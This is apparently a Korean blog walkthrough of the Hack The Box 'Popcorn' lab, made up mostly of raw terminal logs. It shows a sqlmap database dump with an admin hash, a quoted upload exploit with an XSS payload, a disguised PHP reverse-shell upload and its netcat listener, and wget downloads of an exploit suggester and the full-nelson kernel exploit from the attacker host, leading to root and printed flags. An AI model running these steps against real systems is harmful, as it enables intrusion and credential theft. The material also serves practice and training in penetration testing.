1. SCANNING
┌──(root💀takudaddy)-[/htb/popcorn]
└─# nmap -sC -sV -p- -oA pop 10.10.10.6
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 22:57 KST
Nmap scan report for 10.10.10.6
Host is up (0.21s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.1p1 Debian 6ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 3e:c8:1b:15:21:15:50:ec:6e:63:bc:c5:6b:80:7b:38 (DSA)
|_ 2048 aa:1f:79:21:b8:42:f4:8a:38:bd:b8:05:ef:1a:07:4d (RSA)
80/tcp open http Apache httpd 2.2.12 ((Ubuntu))
|_http-server-header: Apache/2.2.12 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
2. WEB ENUMERATION
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS
+ Retrieved x-powered-by header: PHP/5.2.10-2ubuntu6.10
+ /test: Output from the phpinfo() function was found.
+ OSVDB-112004: /test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /test: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
shell+ /test.php: Output from the phpinfo() function was found.
+ /test/: Output from the phpinfo() function was found.
+ OSVDB-3092: /test/: This might be interesting...
+ OSVDB-3233: /test/php_info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
---- Entering directory: http://10.10.10.6/torrent/users/ ----
+ http://10.10.10.6/torrent/users/change_password (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/forgot_password (CODE:200|SIZE:7917)
+ http://10.10.10.6/torrent/users/img (CODE:200|SIZE:701)
+ http://10.10.10.6/torrent/users/index (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/index.php (CODE:200|SIZE:80)
+ http://10.10.10.6/torrent/users/registration (CODE:200|SIZE:8179)
==> DIRECTORY: http://10.10.10.6/torrent/users/templates/
shellshcok
apache 2.2.12
sqlmap
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap --url http://10.10.10.6/torrent/login.php --data="username=asd&password=asd" --dbs --batch
[01:11:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 9.10 (Karmic Koala)
web application technology: PHP, PHP 5.2.10, Apache 2.2.12
back-end DBMS: MySQL >= 5.0
[01:11:46] [INFO] fetching database names
[01:11:46] [INFO] retrieved: 'information_schema'
[01:11:46] [INFO] retrieved: 'torrenthoster'
available databases [2]:
[*] information_schema
[*] torrenthoster
[01:11:46] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.10.10.6'
[*] ending @ 01:11:46 /2021-04-18/
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap -r req.txt -D torrenthoster --tables --batch
Database: torrenthoster
[8 tables]
+---------------+
| log |
| ban |
| categories |
| comments |
| namemap |
| news |
| subcategories |
| users |
+---------------+
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap -r req.txt -D torrenthoster --tables -dump --batch
Database: torrenthoster
Table: subcategories
[35 entries]
+----+-------+-----------------+
| id | catid | name |
+----+-------+-----------------+
| 34 | 5 | Rap |
| 35 | 5 | Rock |
| 32 | 5 | Punk |
| 33 | 5 | R&B |
| 31 | 5 | Pop |
| 30 | 5 | Hip Hop |
| 27 | 4 | Wallpapers |
| 26 | 4 | Other |
| 25 | 3 | Religion |
| 24 | 3 | Other |
| 23 | 3 | Manuals |
| 22 | 3 | Funny clips |
| 21 | 3 | Flash/Shockwave |
| 20 | 3 | Comics |
| 19 | 3 | Articles |
| 18 | 2 | Soundtracks |
| 17 | 2 | Rock |
| 16 | 2 | Rap |
| 15 | 2 | R&B |
| 14 | 2 | Punk |
| 13 | 2 | Pop |
| 12 | 2 | Hip Hop |
| 11 | 2 | Classic |
| 10 | 2 | Alternative |
| 9 | 1 | Thriller |
| 8 | 1 | Romance |
| 7 | 1 | Martial Arts |
| 6 | 1 | Horror |
| 5 | 1 | Family |
| 4 | 1 | Drama |
| 1 | 1 | Action |
| 2 | 1 | Adventure |
| 3 | 1 | Comedy |
| 29 | 5 | Classic |
| 28 | 5 | Alternative |
+----+-------+-----------------+
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
| id | email | joined | password | userName | privilege | lastconnect |
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
| 3 | admin@yourdomain.com | 2007-01-06 21:12:46 | d5bfedcee289e5e05b86daad8ee3e2e2 | Admin | admin | 2007-01-06 21:12:46 |
+----+----------------------+---------------------+----------------------------------+----------+-----------+---------------------+
┌──(root💀takudaddy)-[/htb/popcorn]
└─# sqlmap --url http://10.10.10.6/torrent/login.php --data="username=asd&password=asd" --dump-all --batch
┌──(root💀takudaddy)-[/htb/popcorn]
└─# hash-identifier d5bfedcee289e5e05b86daad8ee3e2e2 1 ⚙
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Possible Hashs:
[+] MD5
[+] Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))
d5bfedcee289e5e05b86daad8ee3e2e2
복호화가 안됨
┌──(root💀takudaddy)-[/htb/popcorn]
└─# searchsploit torrent hoster
-------------------------------------------------- ---------------------------------
Exploit Title | Path
-------------------------------------------------- ---------------------------------
Torrent Hoster - Remount Upload | php/webapps/11746.txt
-------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root💀takudaddy)-[/htb/popcorn]
└─# searchsploit -m php/webapps/11746.txt
Exploit: Torrent Hoster - Remount Upload
URL: https://www.exploit-db.com/exploits/11746
Path: /usr/share/exploitdb/exploits/php/webapps/11746.txt
File Type: HTML document, ASCII text, with CRLF line terminators
Copied to: /htb/popcorn/11746.txt
┌──(root💀takudaddy)-[/htb/popcorn]
└─# cat 11746.txt
========================================================================================
| # Title : Torrent Hoster Remont Upload Exploit
| # Author : El-Kahina
| # Home : www.h4kz.com |
| # Script : Powered by Torrent Hoster.
| # Tested on: windows SP2 Fran�ais V.(Pnx2 2.0) + Lunix Fran�ais v.(9.4 Ubuntu)
| # Bug : Upload
|
====================== Exploit By El-Kahina =================================
# Exploit :
1 - use tamper data :
http://127.0.0.1/torrenthoster//torrents.php?mode=upload
2-
<center>
Powered by Torrent Hoster
<br />
<form enctype="multipart/form-data" action="http://127.0.0.1/torrenthoster/upload.php" id="form" method="post" onsubmit="a=document.getElementById('form').style;a.display='none';b=document.getElementById('part2').style;b.display='inline';" style="display: inline;">
<strong>���� ��� ����� �� ��:</strong> <?php echo $maxfilesize; ?>��������<br />
<br>
<input type="file" name="upfile" size="50" /><br />
<input type="submit" value="��� �����" id="upload" />
</form>
<div id="part2" style="display: none;">��� ��� ����� .. �� ���� �����</div>
</center>
3 - http://127.0.0.1/torrenthoster/torrents/ (to find shell)
4 - Xss:
http://127.0.0.1/torrenthoster/users/forgot_password.php/>"><ScRiPt>alert(00213771818860)</ScRiPt>
==========================================
Greetz : Exploit-db Team
all my friend :(Dz-Ghost Team )
im indoushka's sister
의미 없음
3. EXOLOITATION
회원가입 가능
토렌트 파일 업로드 가능
이미지 업로드 가능
리버스쉘 만들어
확장자를 jpg 등으로 만든 뒤
버프로 중간에 변조
업로드 디렉터리 가보면
생성된 php 파일이 있음
┌──(root💀takudaddy)-[/htb/popcorn]
└─# nc -lvnp 7979 1 ⚙
listening on [any] 7979 ...
connect to [10.10.14.13] from (UNKNOWN) [10.10.10.6] 38386
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
08:34:36 up 15:39, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$
침투 성공
4. PRIVILEGE ESCALATION
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@popcorn:/$
www-data@popcorn:/$ ls
ls
bin dev initrd.img media proc selinux tmp vmlinuz
boot etc lib mnt root srv usr
cdrom home lost+found opt sbin sys var
www-data@popcorn:/$ ls -al
ls -al
total 89
drwxr-xr-x 21 root root 4096 Apr 17 16:55 .
drwxr-xr-x 21 root root 4096 Apr 17 16:55 ..
drwxr-xr-x 2 root root 4096 Mar 17 2017 bin
drwxr-xr-x 4 root root 1024 Oct 26 19:31 boot
lrwxrwxrwx 1 root root 11 Mar 17 2017 cdrom -> media/cdrom
drwxr-xr-x 14 root root 3320 Apr 17 16:55 dev
drwxr-xr-x 87 root root 4096 Apr 17 16:55 etc
drwxr-xr-x 3 root root 4096 Mar 17 2017 home
lrwxrwxrwx 1 root root 37 Mar 17 2017 initrd.img -> boot/initrd.img-2.6.31-14-generic-pae
drwxr-xr-x 15 root root 12288 Oct 1 2020 lib
drwx------ 2 root root 16384 Mar 17 2017 lost+found
drwxr-xr-x 4 root root 4096 Mar 17 2017 media
drwxr-xr-x 2 root root 4096 Oct 20 2009 mnt
drwxr-xr-x 2 root root 4096 Mar 17 2017 opt
dr-xr-xr-x 128 root root 0 Apr 17 16:54 proc
drwx------ 5 root root 4096 Oct 27 11:09 root
drwxr-xr-x 2 root root 4096 Oct 26 19:31 sbin
drwxr-xr-x 2 root root 4096 Oct 20 2009 selinux
drwxr-xr-x 3 root root 4096 Oct 1 2020 srv
drwxr-xr-x 12 root root 0 Apr 17 16:54 sys
drwxrwxrwt 5 root root 4096 Apr 18 08:33 tmp
drwxr-xr-x 11 root root 4096 Oct 1 2020 usr
drwxr-xr-x 15 root root 4096 Mar 17 2017 var
lrwxrwxrwx 1 root root 34 Mar 17 2017 vmlinuz -> boot/vmlinuz-2.6.31-14-generic-pae
www-data@popcorn:/$ c d/home
c d/home
c: command not found
www-data@popcorn:/$ ls
ls
bin dev initrd.img media proc selinux tmp vmlinuz
boot etc lib mnt root srv usr
cdrom home lost+found opt sbin sys var
www-data@popcorn:/$ cd home
cd home
www-data@popcorn:/home$ ls -al
ls -al
total 12
drwxr-xr-x 3 root root 4096 Mar 17 2017 .
drwxr-xr-x 21 root root 4096 Apr 17 16:55 ..
drwxr-xr-x 3 george george 4096 Oct 26 19:35 george
www-data@popcorn:/home$ cd george
cd george
www-data@popcorn:/home/george$ ls -al
ls -al
total 868
drwxr-xr-x 3 george george 4096 Oct 26 19:35 .
drwxr-xr-x 3 root root 4096 Mar 17 2017 ..
lrwxrwxrwx 1 george george 9 Oct 26 19:35 .bash_history -> /dev/null
-rw-r--r-- 1 george george 220 Mar 17 2017 .bash_logout
-rw-r--r-- 1 george george 3180 Mar 17 2017 .bashrc
drwxr-xr-x 2 george george 4096 Mar 17 2017 .cache
-rw------- 1 root root 1571 Mar 17 2017 .mysql_history
-rw------- 1 root root 19 May 5 2017 .nano_history
-rw-r--r-- 1 george george 675 Mar 17 2017 .profile
-rw-r--r-- 1 george george 0 Mar 17 2017 .sudo_as_admin_successful
-rw-r--r-- 1 george george 848727 Mar 17 2017 torrenthoster.zip
-rw-r--r-- 1 george george 33 Apr 17 16:55 user.txt
www-data@popcorn:/home/george$ cat user.txt
cat user.txt
a837fcd27561484ab540a4a9e65d853a
www-data@popcorn:/home/george$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/nell
<ge$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/nell
bash: /dev/nell: Permission denied
www-data@popcorn:/home/george$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
<ge$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 30492 May 12 2009 /bin/ping6
-rwsr-xr-x 1 root root 34696 May 12 2009 /bin/ping
-rwsr-xr-x 1 root root 47096 Oct 23 2009 /bin/umount
-rwsr-xr-x 1 root root 72188 Oct 23 2009 /bin/mount
-rwsr-xr-x 1 root root 22064 Mar 5 2009 /bin/fusermount
-rwsr-xr-x 1 root root 31124 Jul 31 2009 /bin/su
-rwsr-xr-x 1 root root 9548 Jan 11 2011 /usr/lib/pt_chown
-r-sr-xr-x 1 root root 9532 Oct 26 19:31 /usr/lib/vmware-tools/bin32/vmware-user-suid-wrapper
-r-sr-xr-x 1 root root 14320 Oct 26 19:31 /usr/lib/vmware-tools/bin64/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 5544 Apr 29 2009 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 179120 Oct 22 2009 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 40332 Jul 31 2009 /usr/bin/chfn
-rwsr-xr-x 1 root root 30936 Jul 31 2009 /usr/bin/newgrp
-rwsr-xr-x 1 root root 52036 Nov 5 2008 /usr/bin/mtr
-rwsr-xr-x 1 root root 31756 Jul 31 2009 /usr/bin/chsh
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudo
-rwsr-xr-x 1 root root 13948 May 12 2009 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 root root 41292 Jul 31 2009 /usr/bin/passwd
-rwsr-xr-x 1 root root 13816 May 12 2009 /usr/bin/arping
-rwsr-xr-x 1 root root 57964 Jul 31 2009 /usr/bin/gpasswd
-rwsr-xr-x 2 root root 123448 Jun 22 2009 /usr/bin/sudoedit
-rwsr-sr-x 1 daemon daemon 46964 Sep 15 2009 /usr/bin/at
-rwsr-xr-- 1 root dip 277352 Feb 20 2009 /usr/sbin/pppd
-rwsr-sr-x 1 libuuid libuuid 13848 Oct 23 2009 /usr/sbin/uuidd
www-data@popcorn:/tmp$ uname -a
uname -a
Linux popcorn 2.6.31-14-generic-pae #48-Ubuntu SMP Fri Oct 16 15:22:42 UTC 2009 i686 GNU/Linux
www-data@popcorn:/tmp$ uname -r
uname -r
2.6.31-14-generic-pae
www-data@popcorn:/tmp$ cat /etc/*issue
cat /etc/*issue
Ubuntu 9.10 \n \l
공격 가능 방법 추천해주는 코드 받기
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
www-data@popcorn:/tmp$ wget http://10.10.14.13/LES.sh
wget http://10.10.14.13/LES.sh
--2021-04-18 11:59:47-- http://10.10.14.13/LES.sh
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 87559 (86K) [text/x-sh]
Saving to: `LES.sh'
100%[======================================>] 87,559 138K/s in 0.6s
2021-04-18 11:59:48 (138 KB/s) - `LES.sh' saved [87559/87559]
www-data@popcorn:/tmp$ chmod LES.sh
chmod LES.sh
chmod: missing operand after `LES.sh'
Try `chmod --help' for more information.
www-data@popcorn:/tmp$ chmod +x LES.sh
chmod +x LES.sh
www-data@popcorn:/tmp$ ./LES.sh
id
./LES.sh
id
Available information:
Kernel version: 2.6.31
Architecture: i686
Distribution: ubuntu
Distribution version: 9.10
Additional checks (CONFIG_*, sysctl entries, custom Bash commands): performed
Package listing: from current OS
Searching among:
76 kernel space exploits
48 user space exploits
Possible Exploits:
[+] [CVE-2012-0056,CVE-2010-3849,CVE-2010-3850] full-nelson
Details: http://vulnfactory.org/exploits/full-nelson.c
Exposure: highly probable
Tags: [ ubuntu=(9.10|10.10){kernel:2.6.(31|35)-(14|19)-(server|generic)} ],ubuntu=10.04{kernel:2.6.32-(21|24)-server}
Download URL: http://vulnfactory.org/exploits/full-nelson.c
[+] [CVE-2016-5195] dirtycow
Details: https://github.com/dirtycow/dirtycow.github.io/wiki/VulnerabilityDetails
Exposure: probable
Tags: debian=7|8,RHEL=5{kernel:2.6.(18|24|33)-*},RHEL=6{kernel:2.6.32-*|3.(0|2|6|8|10).*|2.6.33.9-rt31},RHEL=7{kernel:3.10.0-*|4.2.0-0.21.el7},ubuntu=16.04|14.04|12.04
Download URL: https://www.exploit-db.com/download/40611
Comments: For RHEL/CentOS see exact vulnerable versions here: https://access.redhat.com/sites/default/files/rh-cve-2016-5195_5.sh
www-data@popcorn:/tmp$ wget http://10.10.14.13/full-nelson.c
wget http://10.10.14.13/full-nelson.c
--2021-04-18 12:10:53-- http://10.10.14.13/full-nelson.c
Connecting to 10.10.14.13:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 9400 (9.2K) [text/x-csrc]
Saving to: `full-nelson.c'
100%[======================================>] 9,400 45.2K/s in 0.2s
2021-04-18 12:10:54 (45.2 KB/s) - `full-nelson.c' saved [9400/9400]
www-data@popcorn:/tmp$ gcc -o attack full-nelson.c
gcc -o attack full-nelson.c
www-data@popcorn:/tmp$ chmod +x attack
chmod +x attack
www-data@popcorn:/tmp$ ./attack
./attack
[*] Resolving kernel addresses...
[+] Resolved econet_ioctl to 0xf84d3280
[+] Resolved econet_ops to 0xf84d3360
[+] Resolved commit_creds to 0xc01645d0
[+] Resolved prepare_kernel_cred to 0xc01647d0
[*] Calculating target...
[*] Triggering payload...
[*] Got root!
# id
id
uid=0(root) gid=0(root)
# cd /root
cd /root
# ls
ls
root.txt
# cat root.txt
cat root.txt
151b12b7d1ce05855b7ad1fe26ff9207
#
끝
728x90
'OSCP > HacktheBox' 카테고리의 다른 글
| 5. Bashed (0) | 2021.04.19 |
|---|---|
| 4. Shocker (0) | 2021.04.19 |
| 2. Lame (0) | 2021.04.17 |
| 1. Time (0) | 2021.04.16 |
| Hack The Box VPN 및 박스 사용법 (2) | 2021.04.16 |